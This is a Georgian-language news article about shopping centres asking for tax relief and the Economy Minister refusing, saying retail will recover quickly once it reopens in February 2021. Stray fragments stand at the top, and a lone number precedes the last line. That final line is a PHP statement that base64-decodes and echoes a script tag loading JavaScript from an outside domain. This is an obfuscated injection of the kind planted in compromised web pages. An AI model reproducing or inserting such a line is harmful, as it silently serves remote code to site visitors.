celsiusi
ავერსი შნაიდერი
სავაჭრო ცენტრები მთავრობას საგადასახადო შეღავათებისა და მთავრობის მხარდაჭერის ანტიკრიზისულ პაკეტში შეყვანის მოთხოვნით დღესაც მიმართეს, თუმცა შეხვედრის დასრულების შემდეგ სავაჭრო ცენტრების წარმომადგენლებმა განაცხადეს, რომ მთავრობამ აღნიშნული თხოვნა არ გაიზიარა. 
 
„საგადასახადო შეღავათებთან დაკავშირებით საუბარი არ არის, რადგან ვაჭრობა ის სექტორია, რომელიც შედარებით სწრაფად აღდგება, ამასთან წინასაახალწლო პერიოდშიც ვამუშავეთ, შესაბამისად სხვა შეზღუდულ ბიზნესებთან შედარებით მათ შეუძლიათ მოიკრიბონ ძალები და საკუთარი რესურსით გააგრძელონ საქმიანობა“, - განაცხადა თურნავამ.
 
მინისტრის შეფასებით, მოსახლეობაში ვაჭრობის მოთხოვნა დიდია და ამიტომ ინდუსტრია სწრაფად შეძლებს აღდგენას. ის თვლის, რომ გასული წლებისგან განსხვავებით 2021 წლის თებერვალი სექტორისთვის შემოსავლიანი იქნება.
 
„ეს არის კომპრომისული გადაწყვეტილება, რომ ამ ეტაპზე მთელი ქვეყნის მასშტაბით გავხსნათ სავაჭრო ინდუსტრია. პანდემიამდე ვიცით, რომ თებერვალი მკვდარი თვე იყო. თუმცა პანდემიის პერიოდში მომხმარებელთა ქცევა განსხვავებულია. მოსახლეობაში დაგროვილია პროდუქტის შეძენის საჭიროება და გადააწყობს თავის ქცევას და მივა სავაჭროდ. ბევრი საჭიროება დაგროვდა - ტანსაცმელი, ფეხსაცმელი, ოჯახები, ვისაც ბავშვები ჰყავთ და ფეხის ზომა სწრაფად ეზრდებათ და უნდა შეუცვალონ ფეხსაცმელი, ასეთი მომხმარებელი მოლოდინის რეჟიმშია და თებერვალიც საკმაოდ აქტიური იქნება“, - განაცხადა ეკონომიკის მინისტრმა.
1355
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");